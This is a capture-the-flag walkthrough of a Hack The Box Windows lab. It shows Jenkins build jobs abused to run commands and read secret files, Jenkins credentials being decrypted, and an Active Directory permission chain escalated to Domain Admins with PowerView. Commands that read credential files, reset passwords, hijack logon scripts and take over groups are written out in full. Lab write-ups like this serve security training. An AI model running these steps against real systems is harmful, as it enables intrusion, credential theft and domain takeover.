Object is a Windows machine running Active Directory. Access to a Jenkins instance allows for triggering builds that execute batch commands. By leveraging this access, Jenkins secrets can be retrieved and decrypted, yielding WinRM credentials for the user oliver. Once a shell is obtained, it is discovered that oliver is a domain user and the machine is a domain controller. Enumeration with BloodHound reveals that domain compromise can be achieved in three steps. First, oliver has ForceChangePassword over smith, enabling access as smith by changing the user's password. Next, smith has GenericWrite over maria, enabling access as maria by editing their logon script. Finally, maria has WriteOwner over the Domain Admins group, allowing the user to take ownership of the group and then be added as a member.
nmap scan:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ nmap -sC -sV -oA nmap/output 10.10.11.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-03 20:24 EST
Nmap scan report for object.htb (10.10.11.132)
Host is up (0.042s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Mega Engines
|_http-server-header: Microsoft-IIS/10.0
8080/tcp open http Jetty 9.4.43.v20210629
|_http-server-header: Jetty(9.4.43.v20210629)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 secondsI visited the webpage on port 80 which had a link to an automation server:
The link above redirected to object.htb:8080, so I added object.htb to /etc/hosts and visited the page which was a Jenkins instance:
I created an account and logged in:
Attempting to access the script console at /script resulted in access denied:
On the Dashboard page, the user had access to create jobs:
I created a job and selected Freestyle project:
On the configuration page, the Build section had an Add build step dropdown with an Execute Windows batch command option:
I tested this with the whoami command:
After clicking save, there was no option to build. Typically, in the left column, there would be a Build Now option, but there wasn't:
However, there are alternative ways to trigger the build. Back on the configuration page in the Build Triggers section, one option is by selecting Build Periodically to run the build at specified intervals. For example, this would run every minute:
I saved the configuration, and after about a minute the build triggered. I viewed the Console Output for the build which showed that the command successfully ran as the user oliver:
Started by timer
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8835497066393974783.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami
object\oliver
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSAnother option to run the build is via the remote access API. On the configuration page, I selected Trigger builds remotely (e.g., from scripts) and gave a token name:
To use the API, I needed to generate an API key, so I clicked the user icon in the top right of Jenkins and went to Configure. On the user configuration page, I selected Add new Token, then Generate, and copied the token:
The Jenkins documentation here states that a build can be triggered with a POST request. So I sent the following request:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ curl -u "test:112067325c86c2057a6e5d4c812bc4805e" -X POST "http://object.htb:8080/job/test-project/build?token=test_token"After the build completed, I went to the console output which successfully ran the whoami command:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins2293941004648113126.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami
object\oliver
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSJenkins stores user info in %JENKINS_HOME%\users\users.xml, so back in the build configuration, I set the batch command to the following:
type %JENKINS_HOME%\users\users.xmlAfter triggering the build, users.xml was displayed in the console output:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins10023837392536135080.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\users.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
<version>1</version>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>test</string>
<string>test_10072431638714946254</string>
</entry>
<entry>
<string>admin</string>
<string>admin_17207690984073220035</string>
</entry>
</idToDirectoryNameMap>
</hudson.model.UserIdMapper>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSWith the ability to read files on the server, I was able to decrypt Jenkins secrets using the Jenkins Credentials Decryptor tool, which can be found here. To do so, I needed three files from the Jenkins home directory:
%JENKINS_HOME%/users/<user_directory_name>/config.xml
%JENKINS_HOME%/secrets/master.key
%JENKINS_HOME%/secrets/hudson.util.SecretSo based on users.xml, the admin user's config.xml would be:
%JENKINS_HOME%/users/admin_17207690984073220035/config.xmlI set the batch command to:
type %JENKINS_HOME%\users\admin_17207690984073220035\config.xmlOnce the build completed, I went to the console output to reveal config.xml:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins17161737380000944563.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>admin</id>
<fullName>admin</fullName>
<properties>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
<id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
<description></description>
<username>oliver</username>
<password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
<usernameSecret>false</usernameSecret>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
<triggers/>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<hudson.model.MyViewsProperty>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<jenkins.security.seed.UserSeedProperty>
<seed>ea75b5bd80e4763e</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
<hudson.model.TimeZoneProperty/>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
<emailAddress>admin@object.local</emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1634793332195</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
</properties>
</user>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSTo read master.key, I set the batch command to:
type %JENKINS_HOME%\secrets\master.keyConsole output:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8435746844721434956.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\master.key
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSTo read hudson.util.Secret, I set the batch command to:
type %JENKINS_HOME%\secrets\hudson.util.SecretConsole output:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins6004140155461822663.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
�aPTñ‹ìQw3訾®Ã€ƒg·¢dw-J)
uM†’,Ábˆn¨
\îÙ!Ë÷s¢E¹Ä1âªaí;>©×õU‹‡¾Õµÿ™Þ8 îƽ¿xd$³ÌYU
©k1Α}ôAö»Ýv–…í„�¬©•
`K� 8
D�aIâXÒD-Å"´¾¯í‹äGt\ñQå_]Æš”�Ç>J/©«ÎL('ÞìU§ �JÌ“á|R´7Šè=vP7ˆ:ˆDÕ{ºKI8²Äžû!U�ק“úêXÊ P¿fŠáE4ìLܤ^ˆöð‡*áËù‚ZˆuÒ®tdÊ„! 7zßQ"
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSSince hudson.util.Secret was a binary, I needed to convert it to base64 to copy it. So I set the batch command to:
powershell -c [convert]::ToBase64String((cat %JENKINS_HOME%\secrets\hudson.util.Secret -Encoding byte))Then, it was outputted as base64:
Started by remote host 10.10.14.55
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project
[test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins16252520389882112308.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>powershell -c [convert]::ToBase64String((cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret -Encoding byte))
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0
Finished: SUCCESSI copied the string and base64 decoded it into a file:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ echo "gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=" | base64 -d > hudson.util.SecretAfter saving config.xml, master.key, and hudson.util.Secret locally, I used Jenkins Credentials Decryptor to obtain the credentials for the user oliver:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ chmod +x jenkins-credentials-decryptor
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ ./jenkins-credentials-decryptor
Please provide all required flags.
Usage:
jenkins-credentials-decryptor \
-m master.key \
-s hudson.util.Secret \
-c credentials.xml \
-o json
Flags:
-c string
(required) credentials.xml file location
-m string
(required) master.key file location
-o string
(optional) output format [json|text] (default "json")
-s string
(required) hudson.util.Secret file location
-version
(optional) show version
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ ./jenkins-credentials-decryptor -c config.xml -m master.key -s hudson.util.Secret
[
{
"id": "320a60b9-1e5c-4399-8afe-44466c9cde9e",
"password": "c1cdfun_d2434",
"username": "oliver"
}
]Since this was a Windows machine, I checked these credentials against WinRM. netexec confirmed that these credentials were valid:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ netexec winrm 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434'
WINRM 10.10.11.132 5985 JENKINS [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local)
WINRM 10.10.11.132 5985 JENKINS [+] object.local\oliver:c1cdfun_d2434 (Pwn3d!)evil-winrm shell as oliver:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'oliver' -p 'c1cdfun_d2434'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver
*Evil-WinRM* PS C:\Users\oliver\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\oliver\desktop> ls
Directory: C:\Users\oliver\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2024 5:23 PM 34 user.txtEnumeration revealed that the user was part of an AD domain and netstat indicated that the machine was a domain controller based on the listening ports:
*Evil-WinRM* PS C:\Users\oliver\desktop> netstat -an | findstr LISTEN
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49684 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49695 0.0.0.0:0 LISTENING
TCP 10.10.11.132:53 0.0.0.0:0 LISTENING
TCP 10.10.11.132:139 0.0.0.0:0 LISTENING
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING
<...snip...>To collect domain data, I uploaded SharpHound.exe, but it didn't run. Next, I tried SharpHound.ps1 which worked:
*Evil-WinRM* PS C:\programdata> upload SharpHound.ps1
Info: Uploading /home/kali/Desktop/HTB/Object/SharpHound.ps1 to C:\programdata\SharpHound.ps1
Data: 1744464 bytes of 1744464 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> . .\SharpHound.ps1
*Evil-WinRM* PS C:\programdata> Invoke-BloodHound -CollectionMethods All -OutputDirectory C:\programdata
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip
-a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 12/3/2024 6:49 PM 578048 SharpHound.exe
-a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1I downloaded the ZIP:
*Evil-WinRM* PS C:\programdata> download 20241203185242_BloodHound.zip
Info: Downloading C:\programdata\20241203185242_BloodHound.zip to 20241203185242_BloodHound.zip
Info: Download successful!After uploading the data into BloodHound, viewing First Degree Object Control for oliver showed that the user had ForceChangePassword rights over smith:
First Degree Object Control for smith showed GenericWrite access over maria:
First Degree Object Control for maria showed WriteOwner access over the Domain Admins group:
Therefore, domain admin could be achieved in three jumps. So next, I uploaded PowerView into the WinRM session:
*Evil-WinRM* PS C:\programdata> upload PowerView.ps1
Info: Uploading /home/kali/Desktop/HTB/Object/PowerView.ps1 to C:\programdata\PowerView.ps1
Data: 1206372 bytes of 1206372 bytes copied
Info: Upload successful!Using Set-DomainUserPassword from Powerview, I changed the password of smith:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $passwordI was then able to log in as smith over WinRM:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'smith' -p 'P@ssw0rd'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smithSince smith had GenericWrite over maria, I attempted a targeted kerberoasting attack, but the password didn't crack. However, as mentioned here, GenericWrite can also be used to edit the logon script of a user. Thus, I created a PowerShell script (run.ps1) containing a command to output the results of ls c:\users\maria into c:\programdata\output:
*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria > c:\programdata\output" > run.ps1Then, using PowerView, I set the logon script path for maria to be c:\programdata\run.ps1:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="c:\programdata\run.ps1"}output was written into the current directory:
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip
-a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 12/3/2024 7:04 PM 3476 output
-a---- 12/3/2024 7:00 PM 904779 PowerView.ps1
-a---- 12/3/2024 7:04 PM 88 run.ps1
-a---- 12/3/2024 6:49 PM 578048 SharpHound.exe
-a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1I was able to enumerate the user directory for maria by reading output:
*Evil-WinRM* PS C:\programdata> cat output
Directory: C:\users\maria
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/22/2021 3:54 AM 3D Objects
d-r--- 10/22/2021 3:54 AM Contacts
d-r--- 10/25/2021 3:47 AM Desktop
d-r--- 10/25/2021 10:07 PM Documents
d-r--- 10/22/2021 3:54 AM Downloads
d-r--- 10/22/2021 3:54 AM Favorites
d-r--- 10/22/2021 3:54 AM Links
d-r--- 10/22/2021 3:54 AM Music
d-r--- 10/22/2021 3:54 AM Pictures
d-r--- 10/22/2021 3:54 AM Saved Games
d-r--- 10/22/2021 3:54 AM Searches
d-r--- 10/22/2021 3:54 AM VideosNext, I edited run.ps1 to list the contents of c:\users\maria\desktop:
*Evil-WinRM* PS C:\programdata> echo "ls c:\users\maria\desktop > c:\programdata\output" > run.ps1
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip
-a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 12/3/2024 7:06 PM 830 output
-a---- 12/3/2024 7:00 PM 904779 PowerView.ps1
-a---- 12/3/2024 7:06 PM 104 run.ps1
-a---- 12/3/2024 6:49 PM 578048 SharpHound.exe
-a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1c:\users\maria\desktop contained Engines.xls:
*Evil-WinRM* PS C:\programdata> cat output
Directory: C:\users\maria\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2021 8:13 AM 6144 Engines.xlsI edited run.ps1 to copy Engines.xls into c:\programdata:
*Evil-WinRM* PS C:\programdata> echo 'copy c:\users\maria\desktop\Engines.xls c:\programdata' > run.ps1
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 12/3/2024 6:52 PM 11443 20241203185242_BloodHound.zip
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
-a---- 12/3/2024 6:52 PM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 12/3/2024 7:09 PM 830 output
-a---- 12/3/2024 7:00 PM 904779 PowerView.ps1
-a---- 12/3/2024 7:09 PM 114 run.ps1
-a---- 12/3/2024 6:49 PM 578048 SharpHound.exe
-a---- 12/3/2024 6:51 PM 1308348 SharpHound.ps1I downloaded Engines.xls:
*Evil-WinRM* PS C:\programdata> download Engines.xls
Info: Downloading C:\programdata\Engines.xls to Engines.xls
Info: Download successful!Engines.xls contained three passwords:
I used netexec to check each password against WinRM, and W3llcr4ft3d_4cls was valid:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ netexec winrm 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls'
WINRM 10.10.11.132 5985 JENKINS [*] Windows 10 / Server 2019 Build 17763 (name:JENKINS) (domain:object.local)
WINRM 10.10.11.132 5985 JENKINS [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)evil-winrm shell as maria:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\mariaAs discovered earlier in BloodHound, maria had WriteOwner permissions on Domain Admins. I used PowerView to change the owner of Domain Admins to maria, give the user full rights, and then add the user as a member:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity 'maria' -Rights All
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'I confirmed maria was successfully added to the Domain Admins group:
*Evil-WinRM* PS C:\programdata> net user maria
User name maria
Full Name maria garcia
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 8:16:32 PM
Password expires Never
Password changeable 10/22/2021 8:16:32 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script c:\programdata\run.ps1
User profile
Home directory
Last logon 12/3/2024 7:14:20 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.In order for the change to actually take effect, I needed to exit the WinRM session and log in again. After doing so, I was then able to access the administrator user's directory:
┌──(kali㉿kali)-[~/Desktop/HTB/Object]
└─$ evil-winrm -i 10.10.11.132 -u 'maria' -p 'W3llcr4ft3d_4cls'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> cd \users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> ls
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2024 5:23 PM 34 root.txt